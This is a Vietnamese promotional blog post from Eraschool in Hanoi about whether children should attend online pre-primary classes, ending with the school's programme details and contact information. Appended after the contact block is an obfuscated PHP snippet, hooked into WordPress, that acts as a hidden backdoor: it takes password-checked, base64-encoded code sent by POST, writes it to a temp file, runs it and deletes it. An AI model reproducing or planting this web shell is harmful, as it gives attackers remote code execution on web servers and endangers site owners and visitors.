Có nên tham gia lớp tiền tiểu học Online không?

post

Học online và làm việc là những nếp sinh hoạt được hình thành và phát triển sau nhiều đợt dịch Covid-19 diễn ra liên tiếp. Có nhiều lớp online được mở ra, trong đó có cả lớp tiền tiểu học. Vậy các lớp lớp tiền tiểu học online có chất lượng không? Khi nào thì nên tham gia những lớp học này? Mời ba mẹ phân tích cùng Eraschool qua bài viết dưới đây nhé! 

Tại sao lại là lớp tiền tiểu học Online?

Dù là lớp tiền tiểu học online hay offline truyền thống thì mục đích của khóa học này vẫn là giúp các con làm quen với môi trường học tập mới và nếp sinh hoạt mới. Khối lượng kiến thức, hoạt động trên lớp của cấp học mầm non với tiểu học có sự khác biệt khá lớn nên khi mới bước vào lớp 1, các con rất dễ bị “khủng hoảng”. Vì vậy, lớp tiền tiểu học là nơi giúp con được trang bị một tinh thần tốt để quen dần với cách học tập của học sinh lớp 1. Ngoài ra, các con cũng sẽ được thêm những kiến thức mới, kỹ năng mới,… thông qua các hoạt động vui chơi ở lớp. 

Được một chuẩn bị một tâm lý vững vàng, con sẽ tự tin bước vào lớp 1
Được một chuẩn bị một tâm lý vững vàng, con sẽ tự tin bước vào lớp 1

Các lớp tiền tiểu học online đã được mở ra như một “giải pháp” cứu cánh  giúp con có thể cập nhật kiến thức theo một cách “bình thường mới” trong thời điểm Covid-19 diễn ra. Có thể khi học online các con thiệt thòi hơn nhiều so với học offline do thiếu các hoạt động tương tác cùng nhau. Tuy nhiên, ở thời điểm dịch bệnh thì phương pháp học này đã là phương án tốt nhất. 

Khi nào nên học lớp tiền tiểu học Online?

Trong những thời điểm dịch bệnh phức tạp hoặc chưa tìm được lớp phù hợp thì ba mẹ có thể cân nhắc đăng ký lớp tiền tiểu học online cho con. Có khá nhiều đơn vị cung cấp lớp tiền tiểu học online như một số các nền tảng học trực tuyến hoặc các đơn vị đào tạo có hình thức học online. 

Học tiền tiểu học chất lượng ở đâu?

Eraschool Hà Nội tự hào là ngôi trường liên cấp có chất lượng đào tạo tốt với 3 cấp đào tạo: Tiền tiểu học – Tiểu học – Trung học cơ sở. Eraschool tâm niệm rằng, thiên nhiên sẽ đem đến cho các con môi trường học tập ưu việt nhất. Vì vậy, khi theo học lớp tiền tiểu học của trường, trẻ cũng sẽ được trải nghiệm cuộc sống gần gũi với thiên nhiên bên cạnh việc làm quen với nếp sinh hoạt của lớp 1. Việc kết hợp linh hoạt không gian học, giữa trong lớp và ngoài khiến giờ học trở nên hứng thú và hiệu quả hơn. 

Các bạn nhỏ được trải nghiệm làm gốm trong một giờ học ở trường
Các bạn nhỏ được trải nghiệm làm gốm trong một giờ học ở trường

Tại sao nên học tiền tiểu học của Eraschool? Vì Eraschool sẽ cho các con một môi trường học tập lý tưởng. Các con sẽ được học và trải nghiệm các hoạt động thường được diễn ra trong cuộc sống như: trồng một cái cây, chăm sóc vật nuôi, trân trọng đồ ăn, dùng thực phẩm không lãng phí… Bên cạnh đó, con cũng được học cách để hòa nhập với cộng đồng, cách ứng xử và giao tiếp với các bạn. 

Hoạt động quan sát rau mầm trong một giờ học bình thường
Hoạt động quan sát rau mầm trong một giờ học bình thường

Chương trình tiền tiểu học của Eraschool có thời lượng linh hoạt từ 1 tháng tới 1 năm. Thời gian học từ thứ 2 đến thứ 6, từ 8:00 đến 16:00 mỗi ngày. Mục tiêu của khóa học như sau: 

  • Giúp con chuẩn bị tâm thế, yêu thích việc học và sẵn sàng bước vào lớp 1
  • Phát triển kỹ năng cá nhân, kỹ năng làm việc nhóm và kỹ năng thích nghi ở môi trường mới 
  • Phát triển ngôn ngữ: bắt đầu làm quen với tiếng Việt bằng cách “chơi đùa” cùng các chữ cái để con không áp lực. 
  • Phát triển tư duy: hình thành & phát triển năng lực tính toán, giải quyết vấn đề thông qua môn học. 
  • Xây dựng nền tảng tiếng Anh căn bản giúp con sẵn sàng học các chương trình học tăng cường tiếng Anh hoặc học hệ chương trình Cambridge. 

Hy vọng sau bài viết này đã giúp ba mẹ có thêm thông tin về lớp tiền tiểu học online, giúp ba mẹ quyết định chọn lớp và hình thức học phù hợp cho con. Cổng tiếp nhận thông tin của Eraschool vẫn luôn mở 24/7, ba mẹ nếu còn thắc mắc về điều gì xin vui lòng liên hệ hotline để được tư vấn sớm nhất. 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}